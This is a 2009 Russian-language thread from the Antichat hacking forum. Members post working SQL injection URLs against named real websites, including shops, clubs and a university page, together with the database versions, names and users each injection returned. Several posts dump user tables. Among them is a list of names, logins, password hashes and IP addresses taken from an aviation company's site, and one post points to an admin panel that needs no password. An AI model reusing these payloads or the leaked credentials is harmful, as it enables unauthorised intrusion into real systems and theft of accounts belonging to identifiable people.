ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7741  
Старый 10.02.2009, 04:16
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.rmets.org/news/detail.php?ID=-332+union+select+1,2,concat _ws(0x3a,version(),database (),user()),4,5,6,7,8+from+users--
Database Version : 4.0.27-standard
Database name : db116118144
User name : dbo116118144@localhost


юзвери:

Код:
http://www.rmets.org/news/detail.php?ID=-332+union+select+ 1,2,concat(user_id,0x3a,user_name,0x3a,user_hash,0x3a,user_emai l),4,5 ,6,7,8+from+users+limit+0,1--
админа так и не нашел кто найдёт напишите в п\м ...

Последний раз редактировалось f1ng3r; 10.02.2009 в 12:14..
 
Ответить с цитированием

  #7742  
Старый 10.02.2009, 04:35
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

================================================== ==========
http://narrow.parovoz.com/emb/?ID=-2+union+select+1,2
version() - 5.0.27-log
database() - gallery
user() - parovoz@localhost
================================================== =========
================================================== ======
http://www.squamlakeschamber.com/display_members.php?id=-3+union+select+version(),2,3,4,5/*
version() - 4.0.26
database() - visitsquam_com
user() - squam@localhost
================================================== ======
================================================== =======
http://www.marathonskating.com/info.php?ID=-3+union+select+1/*
version() - 4.1.22-standard
database() - marathon_marathon
user() - marathon_ave@localhost
================================================== ==========
================================================== ==========
http://www.beagleclub.cz/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,version(),3,4,5,6,7/*
version() - 5.0.32-Debian_7etch8-log
database() - beagleclub_cz
user() - beagleclub@localhost
================================================== =========
================================================== ============
http://nicolian.com/albom/index.php?start=9&album=-99999+union+select+version()/*
user() - nicolian@10.0.75.17
version() - 4.0.25-standard-log
database() - nicolian
================================================== ============
================================================== =================
http://www.costalindacr.com/ficha.php?id=-3+union+select+1,user()
user() - costalinda@localhost
version() - 4.1.20
database() - db_081
================================================== =================

Последний раз редактировалось jokester; 10.02.2009 в 11:32.. Причина: vfs.com БОЯН
 
Ответить с цитированием

  #7743  
Старый 10.02.2009, 04:44
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

тут компики продают
Код:
http://www.oktop.ru/model.php?cat=mfu&art=-brother7427+union+select+1,2,user_name,user_password,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM uvarovka_galllery_users/*
5-я ветка
логин пасс админа :: для форума

ak47-111 admin-111

интернет магазин квазар
Код:
http://www.kvazar.by/index.php?option=com_simplecat&id=-41%20union%20select%20concat_ws(0x3a%20,version(),database(),user()),2,3--
version::4.1.22
User::kvazar_by@touareg.tutby.com
database::kvazar_by

Мужики,держитесь за штаны)))) я чуть не упал))
Код:
http://www.sochi.microlana.ru/admin.php
вход без пароля)))...пол часа искал пасс...а он там не нужен....жесть))

интерет магазин агент 007 8-)
Код:
http://www.007.lviv.ua/vuvid.php?id0=-82%20union%20select%201,2,concat_ws(0x3a%20,version(),database(),user()),4,5,6,7,8,9,10,11,12,13%20%20--
version::4.1.22-standard-log
user::uatur_canada@207.181.4.194
database::uatur_ca

Последний раз редактировалось jokester; 10.02.2009 в 11:36.. Причина: riak.lg.ua и russianst.com БОЯНЫ
 
Ответить с цитированием

  #7744  
Старый 10.02.2009, 09:13
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

MP3Format.ru
Цитата:
http://www.mp3format.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
я люблю музыку )


Gsd.umn.edu
Цитата:
http://www.gsd.umn.edu/news.php?id=4299/**/union/**/select/**/version(),2,3,4,5,6,7,8/*
а так же люблю покушать..)

Последний раз редактировалось sabe; 11.02.2009 в 18:39..
 
Ответить с цитированием

  #7745  
Старый 10.02.2009, 11:01
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.totaltop.ro/detalii-site.php?site=-28748+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT (CONCAT_WS(0x2F2A2A2F,Version(),Database(),User()) ,0x71),0x71),6,7,8,9,10/*



Version: 4.1.11-nt
Database : totaltop
User : totaltop@sh3
 
Ответить с цитированием

  #7746  
Старый 10.02.2009, 12:02
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Проект Межура
Код:
http://kraszem.ru/project.php?id=10+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7--
user(): kraszem@httpd.salamandra.marosnet.net
database():kraszem
version(): 5.0.45
тИЦ:90

Код:
http://kraszem.ru/project.php?id=10+union+select+1,concat(user_id,0x3a,user_login,0x3a,user_password,0x3a,user_hash),3,4,5,6,7+from+users--
1:///msn:897c8fde25c5cc5270cda61425eed3c8:660212f559fe8 4b0b13a3d917da18c8a
2:///qwerty:897c8fde25c5cc5270cda61425eed3c8:b2edaa9bbb c9c8a87b5f5e691e5bcc43

jokester: не нужно их докручивать, боян есть боян. Если раскрутить все скули из топика, он разрастётся ещё на 1500 страниц

Последний раз редактировалось jokester; 10.02.2009 в 12:20.. Причина: artmaterial.ru БОЯН
 
Ответить с цитированием

  #7747  
Старый 10.02.2009, 13:02
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.ufs-aero.com/pages.php?id=578967543+union+select+1,concat_ws(0x 3a,version(),user(),database())--
Database Version: 5.0.51a-log
Database name: db208210290
User name: dbo208210290@74.208.16.98

База

db208210290

Таблицы

acsales
fleet
fuelprice
nav
news
pages
ufscard
users



Достаём пользователей

Цитата:
http://www.ufs-aero.com/pages.php?id=578967543+UNION+SELECT+1,CONCAT(0x787 3716C696E6A626567696E,(SELECT+CONCAT(firstname,0x3 a,un,0x3a,pw,0x3a,level,0x3a,ip)+FROM+db208210290. users+LIMIT+16,1),0x3a)--
firstname:unw:level:ip

:Brent: bheimer: 0449262361ed354cb870302815f9402f :10:71.230.51.69
: UFS-Aero : administrator : 1da1fb3f4e4c97f57b319c47fade82f8 :10:205.238.220.154
:Gareth : gharte: 981d99c1061407bd93f41b5025a4383d :10:71.230.51.69
:Gregg : gheimer : f63ff11aa5b05cfb84cf81292b0f6ba5 :10:205.238.220.154
:Glenn: gstewart: ae463243b033f797858668b931591f92 :5:205.238.220.154
:Jason: jwarren: ab5f90cafb4bd8a13651d78651b89557 :8:205.238.220.154
:Hoyt: hbangs: 8379c86250c50c0537999a6576e18aa7 :10:66.212.1.106
ustin: dpalmer: d5751883938853085bd88b2dd8bffce5 :10:75.147.80.202
:Heskel: hburnstein: c00245006b0aa220c36d1657abe1f96f :10:205.238.220.154
:Ronald: rwatters: 2422c55070091c902595772a114aa672 :2:204.223.176.193
::: d41d8cd98f00b204e9800998ecf8427e :0:69.84.207.39
: obinna kingsley : obi:e43dbc651880164a05a28b09cafc738c :2:80.78.215.77
: test: none: 334c4a4c42fdb79d7ebc3e73b517e6f8 :2:66.212.1.106
: Robert: cigarmanbob: e96946e35431ae7293c882f4d0d3398d :2:204.28.140.7
: Hoyt: hvbangs: 0264e1527230cd1780b58623850ff685 :10:205.238.220.154
: Michael :mderk: db205babfde4780567e539b178b2da2c :2:75.146.205.221
 
Ответить с цитированием

  #7748  
Старый 10.02.2009, 13:32
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

blindcanadians.ca - PR6
Код:
http://www.blindcanadians.ca/press_releases/index.php?BriefID=-44+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4--
DB Version: 5.0.67-community
User : blindcan_blindca@localhost
DB : blindcan_aebc
Доступна INFORMATION_SCHEMA...
В принципе ничего интересного нет в базе, есть немного мыл, и всякая фигня =(
 
Ответить с цитированием

  #7749  
Старый 10.02.2009, 15:02
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union +select+1,2,3,4,5,concat_ws(0x3a,version(),databas e(),user()),7,8,9,10,11--




Version: 5.0.22-community-nt
Database: :brm
User : root@localhost



http://www.brm.ro/root/index.php?page=sondaje&op=vote&id=26+and+1=0+union +select+1,2,3,4,5,group_concat(user,0x3a,password) ,7,8,9,10,11+from+users--
 
Ответить с цитированием

шопы...
  #7750  
Старый 10.02.2009, 16:39
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию шопы...

-----------------------------------------------------------
Код:
http://www.umkstroy.ru/shop.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
версия/бд/юзер:
Код:
4.1.22-standard:umkstroy_root@localhost:umkstroy_helposcms
-----------------------------------------------------------

The End!

Последний раз редактировалось jokester; 10.02.2009 в 17:05.. Причина: spygenius.co.uk и avtobamper.ru БОЯНЫ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ